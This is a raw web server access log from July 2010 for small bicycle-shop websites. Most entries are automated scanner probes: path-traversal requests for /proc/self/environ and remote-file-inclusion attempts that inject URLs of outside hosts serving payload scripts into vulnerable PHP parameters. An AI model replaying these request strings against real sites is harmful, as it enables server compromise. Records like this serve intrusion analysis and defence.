72.55.156.70 - - [13/Jul/2010:05:33:36 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:33:36 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:39:37 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:39:37 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:39:37 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
64.131.83.162 - - [13/Jul/2010:05:52:51 -0700] "GET /index2.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:53:11 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:53:11 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:53:11 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:53:11 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:53:11 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
72.55.156.70 - - [13/Jul/2010:05:53:11 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:08:47 -0700] "GET /logs/access.log/?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:08:47 -0700] "GET /?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:08:47 -0700] "GET /logs/?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:08:51 -0700] "GET /logs/access.log/?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:08:52 -0700] "GET /logs/?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:08:52 -0700] "GET /?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:09:51 -0700] "GET /?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:09:51 -0700] "GET /logs/?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.180.89.75 - - [13/Jul/2010:06:09:55 -0700] "GET /logs/access.log/?sourcedir=http://www.moderntennisconnect.com/modules/mod_poll/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.12.98 - - [13/Jul/2010:06:12:55 -0700] "GET /include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
218.38.12.98 - - [13/Jul/2010:06:12:55 -0700] "GET /logs//include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.0" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
218.38.12.98 - - [13/Jul/2010:06:13:11 -0700] "GET /include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "svbikes.com"
218.38.12.98 - - [13/Jul/2010:06:13:11 -0700] "GET /logs//include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "svbikes.com"
218.38.12.98 - - [13/Jul/2010:06:21:52 -0700] "GET /include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.svbikes.com"
218.38.12.98 - - [13/Jul/2010:06:21:52 -0700] "GET /logs//include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.svbikes.com"
125.141.91.138 - - [13/Jul/2010:06:21:52 -0700] "GET /skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [13/Jul/2010:06:21:52 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [13/Jul/2010:06:21:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.87 - - [13/Jul/2010:06:28:50 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.87 - - [13/Jul/2010:06:28:52 -0700] "GET /bullitinboard/viewtopic.php?p=14998 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
208.80.193.40 - - [13/Jul/2010:06:39:39 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; Seekmo 10.0.345.0)" "svbikes.com"
218.38.12.98 - - [13/Jul/2010:07:03:37 -0700] "GET /logs/access.log//include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
218.38.12.98 - - [13/Jul/2010:07:07:03 -0700] "GET /logs/access_091010.log//include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "svbikes.com"
218.38.12.98 - - [13/Jul/2010:07:07:40 -0700] "GET /logs/access_100510.log//include/write.php?dir=http://xn--bj0bj06e.com/.include/id.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.svbikes.com"
216.143.131.138 - - [13/Jul/2010:07:09:31 -0700] "GET /logs/access_100310.log HTTP/1.0" 200 1835008 "http://svbikes.com/logs/access_100310.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "svbikes.com"
91.214.44.59 - - [13/Jul/2010:07:14:01 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
91.214.44.59 - - [13/Jul/2010:07:15:02 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
66.249.65.53 - - [13/Jul/2010:07:15:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "svbikes.com"
69.73.157.122 - - [13/Jul/2010:07:30:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
69.73.157.122 - - [13/Jul/2010:07:30:04 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:07:32:32 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:07:32:32 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:07:33:20 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:07:33:24 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:07:42:30 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:07:42:50 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
24.148.13.80 - - [13/Jul/2010:07:49:02 -0700] "GET /logs/index.php?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
24.148.13.80 - - [13/Jul/2010:07:49:02 -0700] "GET /index.php?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:07:59:20 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:07:59:26 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:10:20 -0700] "GET /logs/access.log//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:10:21 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:10:21 -0700] "GET /logs//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
67.226.27.80 - - [13/Jul/2010:08:12:12 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10" "www.svbikes.com"
146.83.237.120 - - [13/Jul/2010:08:15:39 -0700] "GET /logs/access.log//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:15:39 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:15:40 -0700] "GET /logs//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:22:06 -0700] "GET /logs/calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:22:06 -0700] "GET /logs/access.log%20%20/calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:22:06 -0700] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.13.64.148 - - [13/Jul/2010:08:32:03 -0700] "GET /logs/access_091010.log HTTP/1.0" 200 6312959 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:43:35 -0700] "GET /logs/access.log//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:43:35 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:43:36 -0700] "GET /logs//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
194.109.22.68 - - [13/Jul/2010:08:46:20 -0700] "GET /logs/?error=http://visitkalsel.com/id1.txt???? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
194.109.22.68 - - [13/Jul/2010:08:46:20 -0700] "GET /logs/access.log/?error=http://visitkalsel.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.109.22.68 - - [13/Jul/2010:08:46:20 -0700] "GET /?error=http://visitkalsel.com/id1.txt???? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:47:41 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:47:41 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:49:38 -0700] "GET /logs/access.log/calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:52:39 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:53:50 -0700] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.117.234.106 - - [13/Jul/2010:08:53:50 -0700] "GET /logs/calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.117.234.106 - - [13/Jul/2010:08:53:51 -0700] "GET /logs/access_100510.log/calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
209.160.33.117 - - [13/Jul/2010:08:54:12 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.160.33.117 - - [13/Jul/2010:08:54:12 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.160.33.117 - - [13/Jul/2010:08:54:12 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:08:54:33 -0700] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
87.117.234.106 - - [13/Jul/2010:08:54:34 -0700] "GET /logs/access_091010.log/calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
87.117.234.106 - - [13/Jul/2010:08:54:34 -0700] "GET /logs/calendar//tools/send_reminders.php?noSet=0&includedir=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
146.83.237.120 - - [13/Jul/2010:08:58:30 -0700] "GET /logs/access.log//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:58:30 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:08:58:30 -0700] "GET /logs//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:09:04:54 -0700] "GET /logs/access.log//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:09:04:54 -0700] "GET /web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:09:04:55 -0700] "GET /logs//web2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
95.50.85.99 - - [13/Jul/2010:09:12:46 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
95.50.85.99 - - [13/Jul/2010:09:12:46 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
200.62.176.2 - - [13/Jul/2010:09:13:37 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
200.62.176.2 - - [13/Jul/2010:09:13:38 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
92.43.200.150 - - [13/Jul/2010:09:14:33 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/kill9/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.43.200.150 - - [13/Jul/2010:09:14:33 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/kill9/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.43.200.150 - - [13/Jul/2010:09:14:33 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/kill9/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:09:15:14 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:09:15:14 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
146.83.237.120 - - [13/Jul/2010:09:15:15 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.229.26.132 - - [13/Jul/2010:09:17:20 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "houstonbikeshop.com"
87.229.26.132 - - [13/Jul/2010:09:17:20 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "houstonbikeshop.com"
87.229.26.132 - - [13/Jul/2010:09:17:20 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "houstonbikeshop.com"
65.60.53.122 - - [13/Jul/2010:09:18:33 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:18:33 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:18:33 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:18:52 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:18:52 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:18:52 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:18:54 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:18:54 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:18:54 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:19:19 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:19:19 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.53.122 - - [13/Jul/2010:09:19:19 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cashbaby.org/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.229.26.132 - - [13/Jul/2010:09:21:46 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "houstonbikeshop.com"
87.229.26.132 - - [13/Jul/2010:09:21:47 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "houstonbikeshop.com"
87.229.26.132 - - [13/Jul/2010:09:21:47 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "houstonbikeshop.com"
87.117.234.106 - - [13/Jul/2010:09:22:25 -0700] "GET /logs/access_100510.log/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.117.234.106 - - [13/Jul/2010:09:22:25 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "www.svbikes.com"
